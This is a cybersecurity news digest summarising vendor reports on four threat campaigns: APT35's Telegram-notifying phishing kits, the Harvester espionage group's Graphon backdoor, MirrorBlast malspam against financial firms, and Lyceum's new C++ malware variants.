At a glance.
- Charming Kitten phishing campaigns.
- Harvester APT conducts cyberespionage in South Asia.
- MirrorBlast malware targets financial entities.
- Lyceum APT's new malware.
Charming Kitten phishing campaigns.
Google's Threat Analysis Group (TAG) describes the ongoing activities of Iranian threat actor APT35 (also known as Charming Kitten). The threat actor is using phishing kits to set up credential-harvesting sites. Among their targets are people who are interested in the Munich Security and the Think-20 (T20) Italy conferences. TAG notes that the threat actor is using a Telegram bot to notify them when someone visits their phishing pages.
"One of APT35's novel techniques involves using Telegram for operator notifications. The attackers embed javascript into phishing pages that notify them when the page has been loaded. To send the notification, they use the Telegram API sendMessage function, which lets anyone use a Telegram bot to send a message to a public channel. The attackers use this function to relay device-based data to the channel, so they can see details such as the IP, useragent, and locales of visitors to their phishing sites in real-time. We reported the bot to Telegram and they have taken action to remove it."
Harvester APT conducts cyberespionage in South Asia.
Symantec has spotted a previously unobserved threat actor dubbed "Harvester" targeting telecommunications, government, and IT entities in South Asia, particularly in Afghanistan. Symantec believes the threat actor is state-sponsored and is conducting cyberespionage using custom-made and publicly available malware:
"The attackers deployed a custom backdoor called Backdoor.Graphon on victim machines alongside other downloaders and screenshot tools that provided the attackers with remote access and allowed them to spy on user activities and exfiltrate information.
"We do not know the initial infection vector that Harvester used to compromise victim networks, but the first evidence we found of Harvester activity on victim machines was a malicious URL. The group then started to deploy various tools, including its custom Graphon backdoor, to gain remote access to the network. The group also tried to blend its activity in with legitimate network traffic by leveraging legitimate CloudFront and Microsoft infrastructure for its command and control (C&C) activity."
MirrorBlast malware targets financial entities.
Morphisec is tracking a MirrorBlast malware campaign that's targeting financial services companies. The malware is delivered via phishing emails with malicious Excel documents:
"In September we observed a malspam campaign delivering Excel documents as an attachment. This campaign targets multiple sectors from Canada, the United States, Hong Kong, Europe, and more. The attack chain starts with an email attachment document, but at a later stage, it changes to use the Google feedproxy URL with SharePoint and OneDrive lure, which poses as a file share request. These URLs lead to a compromised SharePoint or a fake OneDrive site that the attackers use to evade detection, in addition to a sign-in requirement (SharePoint) that helps to evade sandboxes."
Lyceum APT's new malware.
Researchers at Kaspersky have observed the Lyceum APT (also known as Hexane) targeting two entities in Tunisia with new strains of malware:
"Our investigation into Lyceum has shown that the group has evolved its arsenal over the years and shifted its usage from the previously documented .NET malware to new versions, written in C++. We clustered those new pieces of malware under two different variants, which we dubbed 'James' and 'Kevin', after recurring names that appeared in the PDB paths of the underlying samples. As in the older DanBot instances, both variants supported similar custom C&C protocols tunneled over DNS or HTTP. That said, we also identified an unusual variant that did not contain any mechanism for network communication. We assume that it was used as a means to proxy traffic between two internal network clusters."
Kaspersky also noticed similarities between Lyceum and the DNSpionage campaign, which has been associated with the Iranian threat actor OilRig.